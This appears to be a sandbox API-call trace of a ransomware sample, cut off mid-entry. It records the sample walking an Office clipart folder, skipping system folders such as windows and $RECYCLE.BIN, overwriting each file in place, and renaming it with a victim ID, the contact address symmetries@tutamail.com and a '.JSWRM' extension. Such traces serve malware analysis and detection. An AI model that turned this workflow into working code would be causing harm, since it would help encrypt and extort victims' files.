FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2135, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SWEST_01.MID", cAlternateFileName="")) returned 1 [0098.268] lstrcmpiW (lpString1="SWEST_01.MID", lpString2=".") returned 1 [0098.268] lstrcmpiW (lpString1="SWEST_01.MID", lpString2="..") returned 1 [0098.268] lstrcmpiW (lpString1="SWEST_01.MID", lpString2="...") returned 1 [0098.268] lstrcmpiW (lpString1="SWEST_01.MID", lpString2="windows") returned -1 [0098.268] lstrcmpiW (lpString1="SWEST_01.MID", lpString2="recovery") returned 1 [0098.268] lstrcmpiW (lpString1="SWEST_01.MID", lpString2="perflogs") returned 1 [0098.268] lstrcmpiW (lpString1="SWEST_01.MID", lpString2="documents and settings") returned 1 [0098.268] lstrcmpiW (lpString1="SWEST_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0098.268] lstrcmpiW (lpString1="SWEST_01.MID", lpString2="system volume information") returned -1 [0098.268] lstrcmpiW (lpString1="SWEST_01.MID", lpString2="msocache") returned 1 [0098.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0098.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SWEST_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SWEST_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SWEST_01.MID", lpUsedDefaultChar=0x0) returned 12 [0098.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0098.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0098.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SWEST_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SWEST_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SWEST_01.MID", lpUsedDefaultChar=0x0) returned 12 [0098.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0098.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0098.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0098.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0098.269] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SWEST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\swest_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.270] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8501) returned 1 [0098.270] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2130) returned 0x205850 [0098.270] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2130, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2130, lpOverlapped=0x0) returned 1 [0098.272] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.272] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2130, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2130, lpOverlapped=0x0) returned 1 [0098.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0098.272] CloseHandle (hObject=0x314) returned 1 [0098.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0098.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0098.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0098.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0098.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0098.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0098.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0098.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0098.273] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SWEST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\swest_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SWEST_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\swest_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0098.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0098.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0098.273] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SY00110_.WMF", cAlternateFileName="")) returned 1 [0098.273] lstrcmpiW (lpString1="SY00110_.WMF", lpString2=".") returned 1 [0098.274] lstrcmpiW (lpString1="SY00110_.WMF", lpString2="..") returned 1 [0098.274] lstrcmpiW (lpString1="SY00110_.WMF", lpString2="...") returned 1 [0098.274] lstrcmpiW (lpString1="SY00110_.WMF", lpString2="windows") returned -1 [0098.274] lstrcmpiW (lpString1="SY00110_.WMF", lpString2="recovery") returned 1 [0098.274] lstrcmpiW (lpString1="SY00110_.WMF", lpString2="perflogs") returned 1 [0098.274] lstrcmpiW (lpString1="SY00110_.WMF", lpString2="documents and settings") returned 1 [0098.274] lstrcmpiW (lpString1="SY00110_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.274] lstrcmpiW (lpString1="SY00110_.WMF", lpString2="system volume information") returned -1 [0098.274] lstrcmpiW (lpString1="SY00110_.WMF", lpString2="msocache") returned 1 [0098.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0098.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00110_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00110_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY00110_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0098.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0098.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00110_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00110_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY00110_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0098.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0098.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0098.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0098.274] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00110_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00110_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.275] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1264) returned 1 [0098.275] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4f0) returned 0x230a00 [0098.275] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x4f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x4f0, lpOverlapped=0x0) returned 1 [0098.360] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.360] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x4f0, lpOverlapped=0x0) returned 1 [0098.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0098.360] CloseHandle (hObject=0x314) returned 1 [0098.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0098.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0098.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0098.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0098.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0098.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0098.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0098.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0098.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.361] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00110_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00110_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00110_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00110_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0098.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0098.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0098.363] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1844, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SY00127_.WMF", cAlternateFileName="")) returned 1 [0098.363] lstrcmpiW (lpString1="SY00127_.WMF", lpString2=".") returned 1 [0098.363] lstrcmpiW (lpString1="SY00127_.WMF", lpString2="..") returned 1 [0098.363] lstrcmpiW (lpString1="SY00127_.WMF", lpString2="...") returned 1 [0098.363] lstrcmpiW (lpString1="SY00127_.WMF", lpString2="windows") returned -1 [0098.363] lstrcmpiW (lpString1="SY00127_.WMF", lpString2="recovery") returned 1 [0098.363] lstrcmpiW (lpString1="SY00127_.WMF", lpString2="perflogs") returned 1 [0098.363] lstrcmpiW (lpString1="SY00127_.WMF", lpString2="documents and settings") returned 1 [0098.363] lstrcmpiW (lpString1="SY00127_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.363] lstrcmpiW (lpString1="SY00127_.WMF", lpString2="system volume information") returned -1 [0098.363] lstrcmpiW (lpString1="SY00127_.WMF", lpString2="msocache") returned 1 [0098.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0098.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00127_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00127_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY00127_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0098.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0098.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00127_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00127_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY00127_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0098.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0098.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0098.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0098.363] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00127_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00127_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.364] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6212) returned 1 [0098.364] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1840) returned 0x205850 [0098.364] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1840, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1840, lpOverlapped=0x0) returned 1 [0098.366] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.366] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1840, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1840, lpOverlapped=0x0) returned 1 [0098.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0098.366] CloseHandle (hObject=0x314) returned 1 [0098.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0098.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0098.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0098.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0098.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0098.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0098.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0098.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0098.367] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00127_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00127_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00127_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00127_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0098.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0098.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0098.368] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x81c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SY00132_.WMF", cAlternateFileName="")) returned 1 [0098.368] lstrcmpiW (lpString1="SY00132_.WMF", lpString2=".") returned 1 [0098.368] lstrcmpiW (lpString1="SY00132_.WMF", lpString2="..") returned 1 [0098.368] lstrcmpiW (lpString1="SY00132_.WMF", lpString2="...") returned 1 [0098.368] lstrcmpiW (lpString1="SY00132_.WMF", lpString2="windows") returned -1 [0098.368] lstrcmpiW (lpString1="SY00132_.WMF", lpString2="recovery") returned 1 [0098.368] lstrcmpiW (lpString1="SY00132_.WMF", lpString2="perflogs") returned 1 [0098.368] lstrcmpiW (lpString1="SY00132_.WMF", lpString2="documents and settings") returned 1 [0098.368] lstrcmpiW (lpString1="SY00132_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.368] lstrcmpiW (lpString1="SY00132_.WMF", lpString2="system volume information") returned -1 [0098.368] lstrcmpiW (lpString1="SY00132_.WMF", lpString2="msocache") returned 1 [0098.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0098.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00132_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00132_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY00132_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0098.368] RtlAllocateHeap 